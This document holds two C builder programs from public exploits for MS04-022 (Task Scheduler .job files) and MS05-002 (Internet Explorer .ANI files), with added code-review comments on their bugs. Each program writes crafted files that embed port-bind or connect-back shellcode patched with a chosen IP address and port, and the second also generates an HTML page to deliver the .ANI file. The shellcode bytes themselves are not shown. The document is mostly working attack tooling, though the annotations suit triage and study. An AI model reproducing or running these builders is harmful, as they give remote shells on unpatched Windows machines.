/*
 * Command-line builder that writes a crafted Task Scheduler ".job" file for
 * the issue tracked as MS04-022 (bulletin id taken from the banner below).
 *
 * Arguments as read by the code:
 *   argv[1]  output file name
 *   argv[2]  payload selector: 1 = port-bind variant, 2 = connect-back variant
 *   argv[3]  TCP port
 *   argv[4]  IPv4 address, read only on the connect-back path
 *
 * Output shape, useful when triaging a sample: the jobfile template, a
 * payload placed at fixed offset 624 (39*16), the first 4 bytes of endofjob,
 * and a 16-bit length value patched in at offset 70.
 *
 * jobfile, portbindsc, connectbacksc, endofjob, usage() and the SET_* macros
 * are defined outside this block; their contents are not visible here.
 *
 * Returns 0 on every path, including the failure path that calls exit(0).
 */
int main(int argc, char **argv) {
    /* NOTE(review): a local named like the libc function; legal at block
     * scope, but strlen() cannot be called inside this function. */
    unsigned short strlen;
    unsigned short port;
    unsigned long ip, sc;
    FILE *fp, *fp2; /* fp2 is never used in this function */

    printf("\n(MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit\n\n");
    printf("--- Coded by .::[ houseofdabus ]::. ---\n\n");

    /* presumably usage() prints help and does not return; verify, because
     * the code below dereferences argv[2] and argv[3] unconditionally */
    if (argc < 4) usage(argv[0]);

    /* NOTE(review): atoi() gives 0 for non-numeric text and sc is unsigned,
     * so a negative value becomes large and is rejected by (sc > 2), while
     * 0 passes the check below and takes the else branch. With argc == 4
     * that branch passes argv[4] == NULL to inet_addr() and to printf("%s"). */
    sc = atoi(argv[2]);
    if ( ((sc == 2) && (argc < 5)) || (sc > 2)) usage(argv[0]);

    fp = fopen(argv[1], "wb");
    if (fp == NULL) {
        printf("[-] error: can\'t create file: %s\n", argv[1]);
        /* NOTE(review): reports success (status 0) to the caller on failure */
        exit(0);
    }

    /* Write the template (header plus filler), dropping its trailing NUL,
     * then move to offset 624 where the payload goes. Return values of
     * fwrite()/fseek() are not checked anywhere in this function. */
    fwrite(jobfile, 1, sizeof(jobfile)-1, fp);
    fseek(fp, 39*16, SEEK_SET);

    /* NOTE(review): no range check; the int from atoi() is truncated to
     * unsigned short on assignment */
    port = atoi(argv[3]);

    printf("[*] Shellcode: ");
    if (sc == 1) {
        /* Patch the port, in network byte order, into the payload array
         * before it is written; the macro mutates portbindsc in place
         * (presumably at a fixed offset; macro body not visible). */
        SET_PORTBIND_PORT(portbindsc, htons(port));
        printf("Portbind, port = %u\n", port);
        fwrite(portbindsc, 1, sizeof(portbindsc)-1, fp);
        fwrite(endofjob, 1, 4, fp);
        fseek(fp, 70, SEEK_SET);
        /* Length for the field at offset 70: template bytes past offset 71
         * plus payload plus the 4-byte trailer, halved. Presumably a count
         * of 2-byte units; confirm against the template header. */
        strlen = (sizeof(jobfile)-1-71+sizeof(portbindsc)-1+4)/2;
    }
    else {
        /* NOTE(review): inet_addr() failure (INADDR_NONE) is not detected,
         * and this branch is also reached for sc == 0 (see above). */
        ip = inet_addr(argv[4]);
        SET_CONNECTBACK_IP(connectbacksc, ip);
        SET_CONNECTBACK_PORT(connectbacksc, htons(port));
        printf("Connectback, port = %u, IP = %s\n", port, argv[4]);
        fwrite(connectbacksc, 1, sizeof(connectbacksc)-1, fp);
        fwrite(endofjob, 1, 4, fp);
        fseek(fp, 70, SEEK_SET);
        /* Same length formula as the port-bind branch, with the
         * connect-back payload size. */
        strlen = (sizeof(jobfile)-1-71+sizeof(connectbacksc)-1+4)/2;
    }

    printf("[*] Generate file: %s\n", argv[1]);
    /* Writes the first 2 bytes of the variable in host byte order at
     * offset 70; assumes unsigned short is exactly 2 bytes wide. */
    fwrite(&strlen, 1, 2, fp);
    fclose(fp);

    return 0;
}
/*
 * Command-line builder that writes two files for the .ANI handling issue
 * tracked as MS05-002 (bulletin id taken from the banner below):
 *   <argv[1]>.ani   fixed 912-byte file: aniheader, then the payload, with
 *                   every remaining byte set to 0x90
 *   <argv[1]>.html  page produced by formatting the html template with
 *                   discl and argv[1]
 *
 * Arguments as read by the code:
 *   argv[1]  base file name (at most 256 characters)
 *   argv[2]  TCP port
 *   argv[3]  IPv4 address
 *
 * aniheader, shellcode, html, discl, usage(), fixx() and the SET_* macros
 * are defined outside this block; their contents are not visible here.
 *
 * Returns 0 on every path, including failures.
 */
int main(int argc, char **argv) {
    FILE *fp;
    unsigned short port;
    unsigned long backip = 0;
    /* NOTE(review): both buffers are unsigned char but are passed to
     * strcpy/strcat/fopen/sprintf/strlen, which take char pointers. */
    unsigned char f[256+5] = "";   /* 261 bytes: file name plus extension */
    unsigned char anib[912] = "";  /* .ani image, later reused for the HTML text */

    printf("\n(MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit\n\n");
    printf("\tCopyright (c) 2004-2005 :: WhiskyCoders :: \n\n\n");
    printf("Tested on all affected systems:\n");
    printf(" [+] Windows Server 2003\n [+] Windows XP SP1, SP0\n");
    printf(" [+] Windows 2000 All SP\n\n");
    printf("%s\n\n", discl);

    /* Compile-time-constant check that header plus payload fit in the
     * 912-byte image with 3 bytes to spare. The "686" in the message only
     * matches this bound for one particular aniheader size; verify. */
    if ( (sizeof(shellcode)-1) > (912-sizeof(aniheader)-3) ) {
        printf("[-] Size of shellcode must be <= 686 bytes\n");
        return 0;
    }

    /* NOTE(review): argv[3] is read further down, so argc == 3 passes this
     * check and later hands a NULL pointer to inet_addr(). Presumably
     * usage() does not return; verify. */
    if (argc < 3) usage(argv[0]);

    /* NOTE(review): a 256-character name fits with ".ani" (256+4+1 = 261)
     * but not with ".html" (256+5+1 = 262), so the second strcat() below
     * can write one byte past the end of f. */
    if (strlen(argv[1]) > 256) {
        printf("[-] Size of filename must be <=256 bytes\n");
        return 0;
    }

    /* creating ani file */
    strcpy(f, argv[1]);
    strcat(f, ".ani");
    printf("[*] Creating %s file ...", f);
    fp = fopen(f, "wb");
    if (fp == NULL) {
        printf("\n[-] error: can\'t create file: %s\n", f);
        return 0;
    }
    /* Pre-fill the whole image with 0x90 so bytes not covered by the header
     * or the payload keep that value. */
    memset(anib, 0x90, 912);

    /* header: copied without its trailing NUL */
    memcpy(anib, aniheader, sizeof(aniheader)-1);

    /* payload: port and address are patched into the shellcode array in
     * place, then the array is copied directly after the header.
     * NOTE(review): atoi() and inet_addr() results are not validated, and
     * the int from atoi() is truncated to unsigned short. */
    port = atoi(argv[2]);
    SET_CONNECTBACK_PORT(shellcode, fixx(port));
    backip = inet_addr(argv[3]);
    SET_CONNECTBACK_IP(shellcode, backip);
    memcpy(anib+sizeof(aniheader)-1, shellcode, sizeof(shellcode)-1);

    /* Always writes the full 912 bytes; the fwrite() result is unchecked. */
    fwrite(anib, 1, 912, fp);
    printf(" Ok\n");
    fclose(fp);

    /* creating html file */
    f[0] = '\0'; /* redundant: strcpy() below overwrites f from the start */
    strcpy(f, argv[1]);
    strcat(f, ".html"); /* see the off-by-one note on the length check above */
    printf("[*] Creating %s file ...", f);
    fp = fopen(f, "wb");
    if (fp == NULL) {
        printf("\n[-] error: can\'t create file: %s\n", f);
        return 0;
    }
    /* NOTE(review): unbounded sprintf() into the 912-byte buffer; the output
     * length depends on html, discl and a name of up to 256 characters,
     * none of which is bounded against sizeof(anib) here. */
    sprintf(anib, html, discl, argv[1]);
    fwrite(anib, 1, strlen(anib), fp);
    printf(" Ok\n");
    fclose(fp);

    return 0;
}